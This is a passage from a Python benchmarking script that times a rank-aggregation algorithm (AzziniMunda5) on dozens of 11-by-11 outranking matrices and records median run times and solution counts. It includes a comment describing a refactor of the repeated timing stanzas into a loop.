[0,30,39,44,44,45,33,38,34,23,20],
[21,0,28,30,39,28,23,34,28,22,18],
[12,23,0,22,44,39,27,26,22,17,18],
[7,21,29,0,34,25,24,27,21,17,12],
[7,12,7,17,0,28,7,11,21,12,19],
[6,23,12,26,23,0,17,17,11,16,11],
[18,28,24,27,44,34,0,29,22,16,12],
[13,17,25,24,40,34,22,0,22,18,19],
[17,23,29,30,30,40,29,29,0,22,30],
[28,29,34,34,39,35,35,33,29,0,19],
[31,33,33,39,32,40,39,32,21,32,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 12, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,23,36,31,27,20,33,27,29,17],
[24,0,20,34,29,28,25,28,23,29,19],
[28,31,0,38,30,29,17,25,29,30,22],
[15,17,13,0,15,21,7,7,12,20,15],
[20,22,21,36,0,23,19,22,7,29,18],
[24,23,22,30,28,0,21,26,22,29,26],
[31,26,34,44,32,30,0,36,25,40,31],
[18,23,26,44,29,25,15,0,15,25,17],
[24,28,22,39,44,29,26,36,0,33,24],
[22,22,21,31,22,22,11,26,18,0,17],
[34,32,29,36,33,25,20,34,27,34,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 13, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,21,25,27,25,25,21,23,18,23],
[28,0,21,29,31,23,26,26,32,28,32],
[30,30,0,32,37,27,28,30,29,24,28],
[26,22,19,0,29,22,24,24,26,19,20],
[24,20,14,22,0,23,25,23,25,17,16],
[26,28,24,29,28,0,26,28,25,19,24],
[26,25,23,27,26,25,0,23,25,22,17],
[30,25,21,27,28,23,28,0,27,27,28],
[28,19,22,25,26,26,26,24,0,18,22],
[33,23,27,32,34,32,29,24,33,0,27],
[28,19,23,31,35,27,34,23,29,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 14, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,31,30,24,25,24,26,29,28,20,28],
[20,0,23,23,20,26,20,22,22,21,28],
[21,28,0,22,18,29,21,21,26,15,30],
[27,28,29,0,26,30,17,18,26,21,29],
[26,31,33,25,0,32,25,22,28,24,26],
[27,25,22,21,19,0,17,21,24,21,27],
[25,31,30,34,26,34,0,27,28,30,33],
[22,29,30,33,29,30,24,0,28,23,31],
[23,29,25,25,23,27,23,23,0,21,33],
[31,30,36,30,27,30,21,28,30,0,29],
[23,23,21,22,25,24,18,20,18,22,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 15, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,20,19,25,13,18,18,22,23,21],
[28,0,17,26,27,19,17,26,19,22,21],
[31,34,0,32,29,22,26,27,23,29,27],
[32,25,19,0,24,21,22,24,26,26,24],
[26,24,22,27,0,22,22,26,22,24,24],
[38,32,29,30,29,0,29,31,33,30,24],
[33,34,25,29,29,22,0,37,32,30,25],
[33,25,24,27,25,20,14,0,23,26,21],
[29,32,28,25,29,18,19,28,0,26,31],
[28,29,22,25,27,21,21,25,25,0,25],
[30,30,24,27,27,27,26,30,20,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 16, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,30,27,24,29,22,34,34,24,33,30],
[21,0,23,25,29,24,32,25,23,26,26],
[24,28,0,27,34,25,31,25,17,31,29],
[27,26,24,0,30,30,33,26,24,30,29],
[22,22,17,21,0,22,22,26,18,20,22],
[29,27,26,21,29,0,29,30,28,31,27],
[17,19,20,18,29,22,0,24,23,20,22],
[17,26,26,25,25,21,27,0,21,25,33],
[27,28,34,27,33,23,28,30,0,29,27],
[18,25,20,21,31,20,31,26,22,0,26],
[21,25,22,22,29,24,29,18,24,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 17, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,20,25,27,19,20,27,22,19,18,29],
[31,0,31,30,26,26,30,25,22,28,28],
[26,20,0,26,23,19,25,21,19,23,25],
[24,21,25,0,20,22,27,18,17,23,27],
[32,25,28,31,0,30,29,31,28,29,30],
[31,25,32,29,21,0,28,28,23,23,28],
[24,21,26,24,22,23,0,19,21,23,22],
[29,26,30,33,20,23,32,0,24,26,29],
[32,29,32,34,23,28,30,27,0,27,33],
[33,23,28,28,22,28,28,25,24,0,30],
[22,23,26,24,21,23,29,22,18,21,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 18, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,28,21,29,26,31,20,27,31,27,21],
[23,0,19,26,21,33,21,28,27,29,20],
[30,32,0,25,32,28,26,23,29,31,20],
[22,25,26,0,23,24,20,20,27,21,24],
[25,30,19,28,0,27,21,25,24,25,19],
[20,18,23,27,24,0,20,19,26,21,17],
[31,30,25,31,30,31,0,30,32,33,29],
[24,23,28,31,26,32,21,0,28,25,23],
[20,24,22,24,27,25,19,23,0,23,22],
[24,22,20,30,26,30,18,26,28,0,18],
[30,31,31,27,32,34,22,28,29,33,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 19, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,28,28,25,32,17,23,31,28,25,26],
[23,0,21,26,32,19,26,22,26,27,23],
[23,30,0,25,41,26,24,22,28,26,23],
[26,25,26,0,31,22,33,32,29,22,26],
[19,19,10,20,0,11,23,23,19,19,23],
[34,32,25,29,40,0,28,32,30,32,27],
[28,25,27,18,28,23,0,27,24,25,23],
[20,29,29,19,28,19,24,0,24,19,26],
[23,25,23,22,32,21,27,27,0,27,30],
[26,24,25,29,32,19,26,32,24,0,19],
[25,28,28,25,28,24,28,25,21,32,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 20, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,20,33,34,25,36,31,35,27,21,32],
[31,0,25,37,33,34,30,43,33,34,34],
[18,26,0,27,29,23,22,34,18,22,18],
[17,14,24,0,21,25,31,32,10,21,22],
[26,18,22,30,0,26,24,35,32,27,25],
[15,17,28,26,25,0,30,31,15,30,20],
[20,21,29,20,27,21,0,34,23,21,21],
[16,8,17,19,16,20,17,0,25,22,11],
[24,18,33,41,19,36,28,26,0,19,28],
[30,17,29,30,24,21,30,29,32,0,27],
[19,17,33,29,26,31,30,40,23,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 21, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,21,20,31,19,21,16,25,33,26,16],
[30,0,24,27,31,25,26,26,31,23,31],
[31,27,0,25,25,28,17,34,30,27,30],
[20,24,26,0,21,21,16,34,32,21,22],
[32,20,26,30,0,30,19,27,29,28,23],
[30,26,23,30,21,0,16,32,36,28,21],
[35,25,34,35,32,35,0,31,35,28,30],
[26,25,17,17,24,19,20,0,29,26,20],
[18,20,21,19,22,15,16,22,0,19,24],
[25,28,24,30,23,23,23,25,32,0,22],
[35,20,21,29,28,30,21,31,27,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 22, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,19,16,18,25,19,17,18,20,20,21],
[32,0,24,20,25,28,20,24,24,26,22],
[35,27,0,26,32,27,25,31,26,28,28],
[33,31,25,0,32,25,21,24,29,29,27],
[26,26,19,19,0,24,18,23,22,22,26],
[32,23,24,26,27,0,27,33,22,25,31],
[34,31,26,30,33,24,0,25,34,28,28],
[33,27,20,27,28,18,26,0,25,20,25],
[31,27,25,22,29,29,17,26,0,27,27],
[31,25,23,22,29,26,23,31,24,0,24],
[30,29,23,24,25,20,23,26,24,27,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 23, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,22,18,24,20,18,18,21,24,22],
[28,0,26,28,28,29,27,29,33,22,31],
[29,25,0,25,31,26,27,25,26,28,25],
[33,23,26,0,33,26,27,23,27,31,28],
[27,23,20,18,0,24,19,20,25,22,20],
[31,22,25,25,27,0,20,25,26,24,26],
[33,24,24,24,32,31,0,27,24,25,29],
[33,22,26,28,31,26,24,0,29,25,22],
[30,18,25,24,26,25,27,22,0,22,24],
[27,29,23,20,29,27,26,26,29,0,25],
[29,20,26,23,31,25,22,29,27,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 24, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,40,31,30,36,40,30,24,51,32,30],
[11,0,32,29,36,20,20,19,34,22,17],
[20,19,0,19,13,21,14,0,35,6,14],
[21,22,32,0,34,32,30,13,34,10,29],
[15,15,38,17,0,17,15,10,30,16,19],
[11,31,30,19,34,0,14,26,35,21,18],
[21,31,37,21,36,37,0,16,42,20,20],
[27,32,51,38,41,25,35,0,39,34,29],
[0,17,16,17,21,16,9,12,0,20,4],
[19,29,45,41,35,30,31,17,31,0,30],
[21,34,37,22,32,33,31,22,47,21,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 25, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,32,24,21,24,19,30,25,20,27],
[24,0,28,27,21,25,24,28,27,18,31],
[19,23,0,21,20,24,17,27,23,19,28],
[27,24,30,0,28,28,24,24,25,22,31],
[30,30,31,23,0,31,23,34,32,27,39],
[27,26,27,23,20,0,23,28,29,18,29],
[32,27,34,27,28,28,0,31,31,24,29],
[21,23,24,27,17,23,20,0,23,27,27],
[26,24,28,26,19,22,20,28,0,17,26],
[31,33,32,29,24,33,27,24,34,0,35],
[24,20,23,20,12,22,22,24,25,16,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 26, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,26,28,29,23,29,29,28,26,26],
[26,0,25,25,24,24,21,26,24,25,24],
[25,26,0,31,28,31,26,32,28,32,30],
[23,26,20,0,29,23,22,24,26,27,26],
[22,27,23,22,0,25,19,28,23,24,23],
[28,27,20,28,26,0,21,29,23,29,24],
[22,30,25,29,32,30,0,24,30,30,27],
[22,25,19,27,23,22,27,0,29,24,30],
[23,27,23,25,28,28,21,22,0,29,23],
[25,26,19,24,27,22,21,27,22,0,25],
[25,27,21,25,28,27,24,21,28,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 27, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,30,26,26,23,33,30,27,31,24,28],
[21,0,23,20,26,32,26,24,34,19,27],
[25,28,0,22,28,32,26,24,33,28,29],
[25,31,29,0,24,31,29,28,33,28,28],
[28,25,23,27,0,31,25,29,33,25,25],
[18,19,19,20,20,0,15,23,27,19,24],
[21,25,25,22,26,36,0,28,33,24,25],
[24,27,27,23,22,28,23,0,32,25,33],
[20,17,18,18,18,24,18,19,0,17,17],
[27,32,23,23,26,32,27,26,34,0,26],
[23,24,22,23,26,27,26,18,34,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 28, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,27,24,35,29,28,31,36,25,30],
[26,0,22,28,29,22,28,24,32,25,25],
[24,29,0,28,30,30,24,26,29,24,30],
[27,23,23,0,30,25,26,27,34,22,24],
[16,22,21,21,0,23,17,15,25,19,21],
[22,29,21,26,28,0,28,26,30,28,29],
[23,23,27,25,34,23,0,25,28,24,28],
[20,27,25,24,36,25,26,0,29,22,24],
[15,19,22,17,26,21,23,22,0,16,19],
[26,26,27,29,32,23,27,29,35,0,27],
[21,26,21,27,30,22,23,27,32,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 29, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,30,31,23,27,27,30,25,24,24,23],
[21,0,21,25,21,20,22,27,20,16,22],
[20,30,0,27,23,25,22,29,22,25,24],
[28,26,24,0,25,28,24,30,29,24,29],
[24,30,28,26,0,32,27,30,30,29,29],
[24,31,26,23,19,0,27,28,24,27,24],
[21,29,29,27,24,24,0,28,27,26,30],
[26,24,22,21,21,23,23,0,25,19,26],
[27,31,29,22,21,27,24,26,0,24,24],
[27,35,26,27,22,24,25,32,27,0,29],
[28,29,27,22,22,27,21,25,27,22,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 30, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,21,23,21,28,24,29,25,22,24,21],
[30,0,24,25,28,27,26,28,24,24,22],
[28,27,0,26,28,29,30,26,26,31,25],
[30,26,25,0,28,27,33,27,25,29,29],
[23,23,23,23,0,24,29,24,22,27,25],
[27,24,22,24,27,0,30,26,26,29,27],
[22,25,21,18,22,21,0,17,23,26,20],
[26,23,25,24,27,25,34,0,20,29,22],
[29,27,25,26,29,25,28,31,0,29,25],
[27,27,20,22,24,22,25,22,22,0,21],
[30,29,26,22,26,24,31,29,26,30,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 31, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,27,25,27,34,25,17,23,26,25],
[25,0,37,26,33,42,42,28,33,43,29],
[24,14,0,39,35,34,37,23,15,26,28],
[26,25,12,0,27,33,25,22,23,27,33],
[24,18,16,24,0,24,48,15,19,32,31],
[17,9,17,18,27,0,36,18,9,24,29],
[26,9,14,26,3,15,0,9,2,23,22],
[34,23,28,29,36,33,42,0,13,34,25],
[28,18,36,28,32,42,49,38,0,41,40],
[25,8,25,24,19,27,28,17,10,0,22],
[26,22,23,18,20,22,29,26,11,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 32, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,32,31,29,27,27,28,29,21,21,23],
[19,0,24,27,24,18,21,28,27,20,23],
[20,27,0,27,22,25,31,22,26,23,22],
[22,24,24,0,25,18,26,29,26,20,20],
[24,27,29,26,0,27,28,27,22,23,21],
[24,33,26,33,24,0,26,27,25,23,24],
[23,30,20,25,23,25,0,25,19,21,21],
[22,23,29,22,24,24,26,0,24,24,19],
[30,24,25,25,29,26,32,27,0,28,23],
[30,31,28,31,28,28,30,27,23,0,27],
[28,28,29,31,30,27,30,32,28,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 33, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
##############################################################
# Instances 34-71 of the 11-alternative / 51-voter family.
#
# The original file repeated one copy-pasted timing stanza per outranking
# matrix; only the matrix and the instance id changed between copies.
# Refactored into a single data-driven loop: the printed rows and the rows
# stacked onto `results` are unchanged (same values, same order), and the
# module-level names left behind (`om`, `times`, `sol`, `algorithm`,
# `start_time`, `i`, `exec_time`, `result`) end with the same values as
# before, so the following stanzas keep working.
#
# `alg`, `rep`, `results`, `np` and `time` are defined earlier in this
# script.  NOTE(review): time.perf_counter() would be a better interval
# timer than time.time(); kept as-is to preserve behavior.
_instances = [
    (34, np.array([
        [0,23,28,14,19,34,23,21,20,19,26],
        [28,0,28,22,18,33,18,28,27,27,30],
        [23,23,0,20,27,30,25,17,26,23,28],
        [37,29,31,0,25,38,31,30,32,32,37],
        [32,33,24,26,0,33,21,27,37,24,32],
        [17,18,21,13,18,0,16,21,15,19,25],
        [28,33,26,20,30,35,0,37,31,20,32],
        [30,23,34,21,24,30,14,0,24,20,25],
        [31,24,25,19,14,36,20,27,0,27,28],
        [32,24,28,19,27,32,31,31,24,0,27],
        [25,21,23,14,19,26,19,26,23,24,0]])),
    (35, np.array([
        [0,12,18,12,18,21,18,21,12,30,33],
        [39,0,18,39,18,39,18,39,18,18,51],
        [33,33,0,33,30,33,12,33,12,12,33],
        [39,12,18,0,18,39,18,21,18,18,51],
        [33,33,21,33,0,33,21,33,12,33,33],
        [30,12,18,12,18,0,18,33,12,30,12],
        [33,33,39,33,30,33,0,33,12,12,33],
        [30,12,18,30,18,18,18,0,30,30,30],
        [39,33,39,33,39,39,39,21,0,51,51],
        [21,33,39,33,18,21,39,21,0,0,33],
        [18,0,18,0,18,39,18,21,0,18,0]])),
    (36, np.array([
        [0,26,26,25,32,27,31,30,31,26,27],
        [25,0,27,21,25,25,22,21,22,20,24],
        [25,24,0,27,26,27,28,23,26,19,28],
        [26,30,24,0,31,23,23,19,26,24,34],
        [19,26,25,20,0,24,19,22,23,17,24],
        [24,26,24,28,27,0,27,21,24,23,23],
        [20,29,23,28,32,24,0,25,26,22,27],
        [21,30,28,32,29,30,26,0,28,31,30],
        [20,29,25,25,28,27,25,23,0,25,26],
        [25,31,32,27,34,28,29,20,26,0,30],
        [24,27,23,17,27,28,24,21,25,21,0]])),
    (37, np.array([
        [0,24,24,32,27,20,23,25,29,22,31],
        [27,0,17,26,21,20,27,27,21,24,21],
        [27,34,0,33,32,23,31,26,36,26,29],
        [19,25,18,0,27,23,22,24,27,16,19],
        [24,30,19,24,0,24,23,27,31,22,23],
        [31,31,28,28,27,0,27,26,30,25,28],
        [28,24,20,29,28,24,0,27,31,22,29],
        [26,24,25,27,24,25,24,0,33,27,25],
        [22,30,15,24,20,21,20,18,0,18,23],
        [29,27,25,35,29,26,29,24,33,0,29],
        [20,30,22,32,28,23,22,26,28,22,0]])),
    (38, np.array([
        [0,25,17,24,24,19,15,22,8,14,17],
        [26,0,21,30,25,22,21,22,18,25,28],
        [34,30,0,34,24,20,28,25,13,27,22],
        [27,21,17,0,17,18,22,29,7,20,16],
        [27,26,27,34,0,31,30,28,15,30,28],
        [32,29,31,33,20,0,36,23,27,32,29],
        [36,30,23,29,21,15,0,24,11,22,33],
        [29,29,26,22,23,28,27,0,17,26,25],
        [43,33,38,44,36,24,40,34,0,42,45],
        [37,26,24,31,21,19,29,25,9,0,22],
        [34,23,29,35,23,22,18,26,6,29,0]])),
    (39, np.array([
        [0,17,25,27,29,26,20,27,26,32,24],
        [34,0,23,32,39,32,28,40,33,33,33],
        [26,28,0,26,27,25,34,32,22,36,29],
        [24,19,25,0,30,22,31,29,31,32,30],
        [22,12,24,21,0,16,16,23,18,26,16],
        [25,19,26,29,35,0,28,27,32,29,29],
        [31,23,17,20,35,23,0,25,30,23,25],
        [24,11,19,22,28,24,26,0,29,28,30],
        [25,18,29,20,33,19,21,22,0,27,15],
        [19,18,15,19,25,22,28,23,24,0,18],
        [27,18,22,21,35,22,26,21,36,33,0]])),
    (40, np.array([
        [0,17,17,30,36,17,30,17,17,26,38],
        [34,0,21,40,45,15,28,34,32,15,38],
        [34,30,0,51,30,30,24,45,24,39,45],
        [21,11,0,0,17,0,11,26,11,15,32],
        [15,6,21,34,0,15,34,21,6,15,38],
        [34,36,21,51,36,0,45,45,30,28,51],
        [21,23,27,40,17,6,0,38,17,21,38],
        [34,17,6,25,30,6,13,0,11,15,32],
        [34,19,27,40,45,21,34,40,0,21,32],
        [25,36,12,36,36,23,30,36,30,0,36],
        [13,13,6,19,13,0,13,19,19,15,0]])),
    (41, np.array([
        [0,26,14,11,18,20,17,17,23,20,30],
        [25,0,23,11,13,23,33,39,30,33,27],
        [37,28,0,19,22,27,39,36,31,13,25],
        [40,40,32,0,25,42,39,42,39,31,34],
        [33,38,29,26,0,32,29,35,26,23,42],
        [31,28,24,9,19,0,28,33,25,25,25],
        [34,18,12,12,22,23,0,24,9,16,19],
        [34,12,15,9,16,18,27,0,21,18,19],
        [28,21,20,12,25,26,42,30,0,16,25],
        [31,18,38,20,28,26,35,33,35,0,36],
        [21,24,26,17,9,26,32,32,26,15,0]])),
    (42, np.array([
        [0,35,32,30,29,24,30,35,33,21,31],
        [16,0,24,23,15,26,18,29,15,14,14],
        [19,27,0,19,17,20,19,21,18,17,19],
        [21,28,32,0,25,23,21,23,28,26,28],
        [22,36,34,26,0,28,29,35,31,24,22],
        [27,25,31,28,23,0,32,34,25,24,25],
        [21,33,32,30,22,19,0,32,30,23,26],
        [16,22,30,28,16,17,19,0,28,17,13],
        [18,36,33,23,20,26,21,23,0,13,26],
        [30,37,34,25,27,27,28,34,38,0,23],
        [20,37,32,23,29,26,25,38,25,28,0]])),
    (43, np.array([
        [0,26,26,17,32,34,38,39,24,17,32],
        [25,0,18,20,39,29,19,33,13,28,35],
        [25,33,0,26,26,35,35,32,30,32,33],
        [34,31,25,0,29,31,42,25,18,25,19],
        [19,12,25,22,0,37,14,10,10,26,19],
        [17,22,16,20,14,0,23,7,12,23,9],
        [13,32,16,9,37,28,0,33,18,17,26],
        [12,18,19,26,41,44,18,0,13,28,35],
        [27,38,21,33,41,39,33,38,0,32,26],
        [34,23,19,26,25,28,34,23,19,0,26],
        [19,16,18,32,32,42,25,16,25,25,0]])),
    (44, np.array([
        [0,18,17,17,16,20,14,10,20,15,12],
        [33,0,31,28,29,35,32,23,30,32,26],
        [34,20,0,26,32,31,32,31,26,34,28],
        [34,23,25,0,24,37,21,21,23,26,27],
        [35,22,19,27,0,36,21,24,25,28,29],
        [31,16,20,14,15,0,14,20,17,26,18],
        [37,19,19,30,30,37,0,28,25,31,25],
        [41,28,20,30,27,31,23,0,29,30,26],
        [31,21,25,28,26,34,26,22,0,37,32],
        [36,19,17,25,23,25,20,21,14,0,22],
        [39,25,23,24,22,33,26,25,19,29,0]])),
    (45, np.array([
        [0,28,17,24,35,9,27,23,13,29,39],
        [23,0,17,12,20,21,26,20,22,25,34],
        [34,34,0,30,49,31,24,31,31,29,39],
        [27,39,21,0,47,30,29,25,17,32,30],
        [16,31,2,4,0,14,10,10,7,27,24],
        [42,30,20,21,37,0,35,35,20,29,44],
        [24,25,27,22,41,16,0,30,19,30,31],
        [28,31,20,26,41,16,21,0,18,29,22],
        [38,29,20,34,44,31,32,33,0,21,34],
        [22,26,22,19,24,22,21,22,30,0,28],
        [12,17,12,21,27,7,20,29,17,23,0]])),
    (46, np.array([
        [0,39,13,50,27,24,39,38,36,15,51],
        [12,0,12,36,26,24,38,12,24,14,36],
        [38,39,0,50,27,24,39,38,36,27,51],
        [1,15,1,0,15,12,27,26,12,15,39],
        [24,25,24,36,0,24,24,12,36,27,36],
        [27,27,27,39,27,0,27,26,25,15,39],
        [12,13,12,24,27,24,0,12,24,15,25],
        [13,39,13,25,39,25,39,0,25,15,25],
        [15,27,15,39,15,26,27,26,0,15,39],
        [36,37,24,36,24,36,36,36,36,0,36],
        [0,15,0,12,15,12,26,26,12,15,0]])),
    (47, np.array([
        [0,26,25,30,32,30,31,26,31,33,24],
        [25,0,24,33,23,28,23,20,19,25,24],
        [26,27,0,25,26,25,23,22,20,31,26],
        [21,18,26,0,28,22,23,19,19,23,24],
        [19,28,25,23,0,22,26,28,22,29,28],
        [21,23,26,29,29,0,21,24,16,27,17],
        [20,28,28,28,25,30,0,25,22,31,22],
        [25,31,29,32,23,27,26,0,17,32,28],
        [20,32,31,32,29,35,29,34,0,36,30],
        [18,26,20,28,22,24,20,19,15,0,22],
        [27,27,25,27,23,34,29,23,21,29,0]])),
    (48, np.array([
        [0,23,23,28,20,21,26,24,26,24,23],
        [28,0,26,25,19,26,26,29,31,26,30],
